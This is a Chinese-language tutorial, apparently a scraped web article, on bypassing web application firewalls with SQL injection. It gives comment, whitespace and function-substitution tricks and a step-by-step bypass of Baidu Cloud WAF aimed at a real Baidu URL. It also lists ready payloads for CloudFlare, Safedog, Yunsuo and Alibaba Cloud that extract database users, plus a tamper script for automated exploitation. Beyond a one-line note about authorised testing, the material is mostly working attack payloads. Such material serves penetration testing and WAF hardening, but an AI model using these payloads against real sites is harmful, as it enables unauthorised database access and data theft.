WAF绕过之SQL注入技术详解<\/h1>

1. WAF概述与分类<\/h2>

WAF(Web Application Firewall)即Web应用防火墙，主要分为三大类：<\/p>

硬件类WAF<\/strong>：如绿盟、天融信、安恒的硬件WAF<\/li>
软件类WAF<\/strong>：如安全狗、云锁、ModSecurity等<\/li>

基于云的WAF<\/strong>：如阿里云、创宇盾等<\/li> <\/ol>
2. SQL注入绕过基础技巧<\/h2>
2.1 注释符利用<\/h3>
不同数据库支持的注释符：<\/p>

数据库<\/th> 注释符<\/th> <\/tr> <\/thead>

MySQL<\/td> \/* *\/<\/code>、#<\/code>、\/*! *\/<\/code>、\/*!50000xx*\/<\/code>、-- <\/code><\/td> <\/tr>
Oracle<\/td> --0a-<\/code><\/td> <\/tr>
MSSQL<\/td> --0a-<\/code><\/td> <\/tr> <\/tbody> <\/table> 2.2 空白字符利用<\/h3> 各数据库支持的空白字符：<\/p> 数据库<\/th> 空白字符<\/th> <\/tr> <\/thead> MySQL<\/td> %09<\/code>、%0A<\/code>、%0B<\/code>、%0C<\/code>、%0D<\/code>、%20<\/code><\/td> <\/tr> Oracle<\/td> %00<\/code>、%09<\/code>、%0A<\/code>、%0B<\/code>、%0C<\/code>、%0D<\/code>、%20<\/code><\/td> <\/tr> MSSQL<\/td> %00<\/code>-%20<\/code><\/td> <\/tr> <\/tbody> <\/table> 2.3 特殊字符连接<\/h3> 在SQL关键字前后可连接的特殊字符：<\/p> +<\/code>号<\/li> -<\/code>号<\/li> @<\/code>号<\/li> !<\/code>号<\/li> '<\/code>号<\/li> "<\/code>号<\/li> ~<\/code>号<\/li> {<\/code>号<\/li> <\/ul> 可结合注释符和空白字符使用。<\/p> 3. 等价替换技术<\/h2> 3.1 函数替换<\/h3> 字符串截取函数替代方案：<\/p> mid(string,1,1)<\/code> 可替换为： substr(user() from 1 for 1)<\/code><\/li> replace(LPAD(user(),2,1),LPAD(user(),2-1,1),"")<\/code><\/li> LPAD(REVERSE(TRIM(lpad(user(),1,SPACE(1)))),1,SPACE(1))<\/code><\/li> <\/ul> <\/li> <\/ul> ASCII码函数替代：<\/p> ascii(c)<\/code>、ord(c)<\/code> 可替换为 conv(hex(c),16,10)<\/code><\/li> <\/ul> 3.2 逗号过滤绕过<\/h3> union select 1,2,3<\/code> 可替换为： union select * from (select 1)a join (select 2)b join (select 3)c<\/code><\/li> <\/ul> <\/li> limit 2,1<\/code> 可替换为 limit 1 offset 2<\/code><\/li> <\/ul> 3.3 比较表达式替代<\/h3> =<\/code> 可替换为： if(abs(strcmp((ascii(mid(user()from(1)for(2)))),114))-1,1,0)<\/code><\/li> find_in_set()<\/code><\/li> regexp<\/code><\/li> <\/ul> <\/li> <<\/code>、><\/code> 可替换为： least(ord('r'),115)<\/code><\/li> greatest(ord('r'),113)<\/code><\/li> between n and m<\/code><\/li> <\/ul> <\/li> <\/ul> 4. WAF绕过核心策略<\/h2> 4.1 目标分解<\/h3> 主要目标<\/strong>：绕过SELECT col FROM table<\/code>语句拦截<\/li> 次要目标<\/strong>：绕过UNION SELECT<\/code>语句拦截<\/li> <\/ol> 4.2 注入语句结构分析<\/h3> SQL注入payload可分为两部分：<\/p> BOUNDARY<\/strong>：利用语句部分（如报错注入中的updatexml<\/code>函数）<\/li> QUERY<\/strong>：基本查询部分（如select concat(0x7e,user,0x7e) from mysql.user limit 1<\/code>）<\/li> <\/ul> 4.3 测试方法论<\/h3> 控制变量法<\/strong>：分别测试BOUNDARY和QUERY部分<\/li> 白盒审计<\/strong>：对于软件类WAF（如安全狗、云锁），可逆向获取规则<\/li> 黑盒测试<\/strong>：对于硬件和云WAF，采用黑盒测试方法<\/li> <\/ol> 4.4 关键字填充策略<\/h3> 在SQL关键字前后设置FUZZ位置：<\/p> 本地FUZZ测试出能正常执行的语句<\/li> 提交到目标站点测试<\/li> 结合注释、空白字符、括号等特性绕过<\/li> 使用增删法确定触发拦截的字符或结构<\/li> 寻找白字符进行替换<\/li> <\/ol> 5. 实战案例：百度云WAF绕过<\/h2> 5.1 UNION SELECT绕过<\/h3> id=1 xor xx union select xx<\/code> → 拦截<\/li> id=1 xor xx union xx select xx<\/code> → 不拦截<\/li> id=1 xor union(select<\/code> → 不拦截<\/li> id=1 xor union(select)<\/code> → 拦截<\/li> id=1 xor union dd (select)<\/code> → 不拦截<\/li> <\/ol> 5.2 SELECT FROM绕过<\/h3> id=1 xor s( select xx from xx)<\/code> → 拦截<\/li> id=1 xor s( select xx from b xx)<\/code> → 不拦截<\/li> id=1 xor s( select @a from xx)<\/code> → 拦截<\/li> id=1 xor s( select @as from xx)<\/code> → 不拦截<\/li> <\/ol> 5.3 最终绕过payload<\/h3> https:\/\/su.baidu.com\/plan.html?id=1xor union dd(select@ \Nfrom xx)<\/code><\/p> 6. 各WAF绕过payload示例<\/h2> 6.1 CloudFlare绕过<\/h3> MSSQL UNION SELECT绕过<\/strong>：<\/p> UNION<\/span>\/*!0SELECT*\/<\/span>1<\/span>,2<\/span>,3<\/span>-- <\/span><\/span><\/span><\/code><\/pre>MYSQL报错注入绕过<\/strong>：<\/p> AND<\/span> updatexml(1<\/span>,concat(0<\/span>x7e,(\/*!0SELECT*\/<\/span>user<\/span>()),0<\/span>x7e),1<\/span>) <\/span><\/span><\/code><\/pre>6.2 安全狗绕过<\/h3> \/*!0union*\/\/*!0select*\/<\/span>1<\/span>,2<\/span>,3<\/span>-- <\/span><\/span><\/span><\/code><\/pre>6.3 云锁绕过<\/h3> id=<\/span>1<\/span> AND<\/span>{<\/span>`<\/span>(if<\/span>(1<\/span>,extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span>\/**\/<\/span>user<\/span>()),0<\/span>x7e)),1<\/span>))`<\/span>}<\/span> <\/span><\/span><\/code><\/pre>6.4 阿里云绕过<\/h3> AND<\/span>{<\/span>`<\/span>(extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span>{<\/span>`<\/span>a`<\/span>}<\/span>from<\/span>{<\/span>`<\/span>mysql.user<\/span>`<\/span>}<\/span>),0<\/span>x7e)))`<\/span>}<\/span> <\/span><\/span><\/code><\/pre>7. 自动化利用工具<\/h2> 推荐使用Python编写的SQL注入漏洞利用工具，特点：<\/p> 参数使用方法与SQLMAP类似<\/li> 每种利用方法单独编写一个类<\/li> PAYLOAD由BOUNDARY和QUERY两部分组成<\/li> 支持tamper脚本对boundary和query单独处理<\/li> <\/ul> Tamper样例：<\/p> def<\/span> tamper<\/span>(payload, **<\/span>kwargs): <\/span><\/span> """ <\/span><\/span><\/span> 安全狗绕过tamper示例 <\/span><\/span><\/span> """<\/span> <\/span><\/span> payload =<\/span> payload.<\/span>replace("UNION"<\/span>, "\/*!0UNION*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("SELECT"<\/span>, "\/*!0SELECT*\/"<\/span>) <\/span><\/span> payload =<\/span> payload.<\/span>replace("FROM"<\/span>, "\/*!0FROM*\/"<\/span>) <\/span><\/span> return<\/span> payload <\/span><\/span><\/code><\/pre>8. 总结与思考<\/h2> WAF绕过需要深入研究SQL语法特性和WAF规则<\/li> 结合注释、空白字符、特殊字符等多种技巧<\/li> 掌握等价替换和函数替代方法<\/li> 采用控制变量法和增删法进行精准测试<\/li> 对于软件类WAF，逆向分析可大幅提高绕过效率<\/li> 自动化工具可提高漏洞利用效率<\/li> <\/ol> 通过系统性地掌握这些技术和方法，可以有效绕过各类WAF对SQL注入的防护，但请注意这些技术仅应用于合法授权的安全测试。<\/p>